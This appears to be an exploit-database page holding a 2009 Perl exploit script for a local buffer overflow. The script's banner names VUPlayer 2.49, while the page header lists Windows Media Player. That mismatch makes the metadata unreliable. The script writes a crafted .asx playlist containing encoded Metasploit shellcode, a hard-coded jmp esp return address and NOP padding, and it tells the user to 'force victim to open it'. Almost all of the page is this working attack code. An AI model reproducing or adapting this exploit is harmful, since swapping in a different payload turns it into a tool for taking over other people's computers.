header-logo
Suggest Exploit
vendor:
Windows Media Player
by:
aBo MoHaMeD
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Windows Media Player
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Win32_exec – EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum

This exploit is a buffer overflow vulnerability in the ASX file header. It is triggered when a maliciously crafted ASX file is opened in Windows Media Player. The exploit overwrites the SEH handler and executes the shellcode, which in this case is a calculator.

Mitigation:

The user should avoid opening untrusted ASX files.
Source

Exploit-DB raw data:

#!/usr/bin/perl

intro();
#does not need a thread method shellcode to run as best as can. seh work great too!
# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x30\x42\x30\x42\x50\x4b\x58\x45\x54\x4e\x43\x4b\x48\x4e\x37".
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48".
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x48".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x58".
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54".
"\x4b\x38\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x48".
"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x57".
"\x4e\x30\x4b\x38\x42\x44\x4e\x50\x4b\x38\x42\x57\x4e\x31\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x43\x4f\x55\x41\x53".
"\x48\x4f\x42\x36\x48\x55\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37".
"\x42\x55\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x36\x4a\x49".
"\x50\x4f\x4c\x58\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56".
"\x4e\x36\x43\x56\x42\x30\x5a";


#it's asx file header.directly get from aBo MoHaMeD's PoC :-)
$header =
"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33\x2E".
"\x30\x22\x3E\x0A\x0D\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x0A\x3C\x54".
"\x49\x54\x4C\x45\x3E\x50\x72\x4F\x20\x53\x70\x59\x3C\x2F\x54\x49".
"\x54\x4C\x45\x3E\x0A\x0D\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46".
"\x3D\x22\x6D\x51\x47\x69\x42\x45\x67\x30\x33\x70\x55\x52\x42\x41".
"\x44\x55\x56\x77\x4A\x75\x4B\x53\x51\x2B\x73\x4D\x45\x6C\x34\x78".
"\x43\x5A\x75\x77\x42\x75\x6A\x53\x53\x58\x4A\x69\x30\x62\x46\x6B".
"\x32\x31\x49\x34\x66\x75\x30\x69\x70\x64\x56\x34\x68\x41\x31\x32".
"\x45\x49\x4F\x6D\x34\x69\x41\x34\x30\x70\x48\x39\x72\x50\x69\x43".
"\x48\x6B\x65\x41\x52\x71\x50\x75\x6A\x4F\x71\x6C\x78\x63\x4D\x6E".
"\x52\x51\x68\x39\x62\x43\x32\x2B\x75\x53\x34\x4D\x54\x67\x63\x2B".
"\x46\x38\x52\x33\x62\x62\x51\x56\x65\x61\x57\x36\x6E\x38\x6C\x5A".
"\x2B\x48\x51\x59\x57\x5A\x4D\x77\x57\x41\x72\x30\x31\x4C\x61\x5A".
"\x38\x64\x64\x57\x37\x38\x59\x69\x58\x45\x49\x75\x5A\x47\x71\x72".
"\x62\x37\x69\x6D\x62\x57\x79\x6B\x4B\x70\x45\x68\x52\x34\x41\x71".
"\x73\x78\x6C\x6F\x6D\x73\x5A\x74\x37\x73\x33\x77\x43\x67\x6A\x72".
"\x69\x47\x75\x62\x48\x78\x5A\x79\x37\x70\x75\x63\x6A\x63\x36\x37".
"\x77\x52\x43\x79\x5A\x31\x4A\x66\x6B\x44\x2F\x33\x55\x4D\x53\x48".
"\x2F\x53\x32\x4B\x35\x68\x79\x62\x34\x33\x38\x4E\x32\x4E\x43\x4B".
"\x7A\x79\x74\x61\x79\x4E\x69\x52\x50\x63\x65\x57\x4B\x50\x6D\x4F".
"\x73\x2F\x4D\x51\x6F\x38\x75\x55\x5A\x35\x43\x52\x2B\x35\x54\x34".
"\x55\x51\x59\x75\x2B\x53\x4D\x62\x75\x69\x75\x6D\x31\x78\x78\x48".
"\x64\x47\x62\x54\x33\x5A\x6F\x63\x63\x6E\x61\x4C\x65\x72\x77\x41".
"\x36\x38\x56\x52\x30\x55\x50\x4E\x76\x62\x66\x64\x45\x64\x74\x44".
"\x43\x4F\x4A\x49\x51\x44\x4A\x66\x72\x34\x45\x6F\x56\x77\x6E\x6F".
"\x49\x45\x43\x57\x73\x57\x38\x37\x6F\x59\x41\x61\x36\x72\x4D\x38".
"\x65\x46\x53\x70\x6C\x42\x63\x6F\x4E\x68\x74\x34\x6D\x4E\x74\x54".
"\x35\x74\x6B\x66\x41\x64\x47\x6D\x66\x66\x54\x4F\x52\x73\x4B\x54".
"\x65\x54\x71\x68\x79\x71\x41\x2F\x30\x57\x39\x49\x79\x41\x70\x4A".
"\x34\x6B\x6A\x4C\x53\x4C\x32\x7A\x31\x4B\x4B\x67\x33\x67\x31\x6C".
"\x65\x63\x58\x66\x7A\x6F\x55\x32\x43\x68\x34\x66\x76\x68\x31\x54".
"\x44\x6D\x68\x34\x57\x39\x69\x37\x42\x72\x6B\x38\x70\x61\x2B\x38".
"\x32\x79\x49\x57\x38\x79\x44\x34\x56\x78\x30\x37\x4C\x57\x49\x39".
"\x4D\x32\x5A\x59\x56\x2F\x63\x68\x72\x48\x35\x4D\x66\x56\x4D\x47".
"\x62\x6C\x56\x4D\x73\x32\x53\x61\x51\x63\x47\x41\x6E\x67\x51\x72".
"\x71\x35\x43\x38\x5A\x6B\x31\x68\x79\x65\x44\x70\x36\x54\x75\x46".
"\x56\x39\x55\x47\x4B\x59\x73\x6F\x65\x4C\x6B\x38\x53\x71\x39\x6F".
"\x58\x63\x5A\x4F\x4C\x42\x50\x70\x67\x4B\x31\x6F\x4E\x35\x63\x65".
"\x47\x77\x38\x30\x70\x31\x4B\x4C\x4C\x4D\x33\x57\x47\x73\x55\x6E".
"\x36\x64\x6E\x62\x51\x63\x62\x57\x6C\x73\x64\x7A\x42\x79\x62\x53".
"\x41\x38\x63\x33\x56\x69\x62\x57\x6C\x30\x51\x47\x31\x70\x62\x48".
"\x63\x77\x63\x6D\x30\x75\x59\x32\x39\x74\x50\x6F\x68\x67\x42\x42".
"\x4D\x52\x41\x67\x41\x67\x42\x51\x4A\x49\x4E\x4E\x36\x56\x41\x68".
"\x73\x44\x42\x67\x73\x4A\x43\x41\x63\x44\x41\x67\x51\x56\x41\x67".
"\x67\x44\x42\x42\x59\x43\x41\x77\x45\x43\x48\x67\x45\x43\x46\x34".
"\x41\x41\x43\x67\x6B\x51\x6E\x55\x35\x2B\x76\x33\x57\x47\x38\x6F".
"\x59\x79\x7A\x67\x43\x5A\x41\x57\x74\x55\x68\x4D\x6C\x76\x7A\x78".
"\x35\x43\x6A\x74\x55\x79\x41\x42\x2F\x72\x6D\x69\x4B\x63\x6F\x2F".
"\x41\x41\x6E\x41\x39\x48\x63\x46\x6D\x6C\x39\x37\x36\x65\x5A\x64".
"\x56\x64\x62\x5A\x6F\x75\x35\x44\x6E\x58\x6D\x79\x2F\x47\x75\x51".
"\x51\x4E\x42\x45\x67\x30\x33\x77\x38\x51\x45\x41\x43\x43\x35\x47".
"\x54\x34\x30\x73\x76\x7A\x5A\x59\x4A\x4B\x59\x6D\x39\x64\x51\x46".
"\x6E\x76\x75\x54\x6B\x56\x68\x52\x72\x79\x50\x73\x65\x4A\x76\x33".
"\x58\x6D\x44\x67\x52\x42\x42\x70\x64\x45\x74\x63\x74\x33\x79\x50".
"\x35\x63\x4F\x61\x47\x31\x41\x6E\x62\x56\x32\x6D\x32\x79\x50\x79".
"\x6C\x6C\x6E\x78\x4A\x41\x61\x74\x7A\x52\x6C\x70\x58\x59\x73\x32".
"\x61\x2B\x6C\x32\x37\x41\x64\x32\x65\x46\x6F\x4C\x6C\x45\x68\x31".
"\x39\x38\x6D\x6A\x56\x50\x75\x66\x59\x4C\x62\x6B\x71\x35\x42\x74".
"\x33\x53\x39\x41\x2B\x46\x36\x69\x58\x68\x51\x72\x2B\x4A\x54\x58".
"\x4D\x41\x54\x50\x44\x48\x67\x34\x43\x2F\x39\x71\x66\x79\x52\x62".
"\x63\x55\x68\x70\x35\x57\x61\x61\x4E\x5A\x42\x6D\x51\x49\x31\x32".
"\x34\x6F\x6D\x4E\x5A\x5A\x54\x4C\x56\x4C\x34\x72\x49\x62\x4C\x73".
"\x56\x49\x77\x33\x77\x79\x4C\x31\x5A\x44\x71\x4D\x38\x72\x72\x73".
"\x54\x51\x41\x57\x72\x61\x47\x35\x6A\x79\x73\x37\x5A\x37\x65\x69".
"\x78\x49\x6B\x64\x64\x58\x37\x36\x73\x6D\x6E\x4D\x78\x53\x56\x67".
"\x50\x6A\x63\x77\x5A\x6B\x49\x43\x37\x49\x2F\x2B\x2F\x41\x4C\x61".
"\x4C\x69\x4F\x41\x74\x31";
#Address=1000D0FF Disassembly=JMP ESP Module Name=D:\Program Files\VUPlayer\BASS.dll
#$ret = "\xff\xd0\x00\x10"; it seems that it's not possible to use \x00 because of processing VUPlayer on .asx files.otherwise we could use this addr

#0x7d17f657 jmp esp shell32.dll winxp sp2
#we use this addr to exploit this.may be you need to change it, so feel free:p
$ret = "\x57\xf6\x17\x7d";
# 0xdeadbeef anything he he
$ecx = "\xef\xbe\xad\xde";
$string1 = "\x33\x33\x33\x37\x34\x6D\x49\x4D\x4F\x70\x4E\x42";
$string2 = "\x90" x 60;
$string3 = "\x90" x 14535;

$asx =  "\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59\x3E".
        "\x0A\x3C\x2F\x41\x53\x58\x3E\x0A";
$payload = $header.$ecx.$string1.$ret.$string2.$shellcode.$string3.$asx;


$playlist="boom.asx";    #playlist name,chage it to anything you want


open($FILE, ">$playlist");
print $FILE $payload;
close($FILE);
print "\n\n\n$playlist created beside this exploit.\n";
print "force victim to open it with VUPlayer\n";
print "good luck\n\n";
sub intro{
print qq(
############################################################
##        Snoop Security Researching Committe             ##
##               www.snoop-security.com                   ##
##            sCORPINo "Amirreza Aminsalehi"              ##
##              scorpino x40 gmail x2e com                ##
## VUPlayer 2.49 Local BOF exploit Code                   ##
## Vendor website: http://www.vuplayer.com                ##
## PoC from aBo MoHaMeD:                                  ##
## http://www.milw0rm.com/exploits/7709                   ##
## special tnX to:                                        ##
## Shahriyar, Adel, Alireza, Yashar and all snoop members ##
## just run and open the boom.asx with                    ##
## VUPlayer , then BOOM !                                 ##
############################################################
);
}

# milw0rm.com [2009-01-11]

Navigation

Suggest Exploit

Services By CQR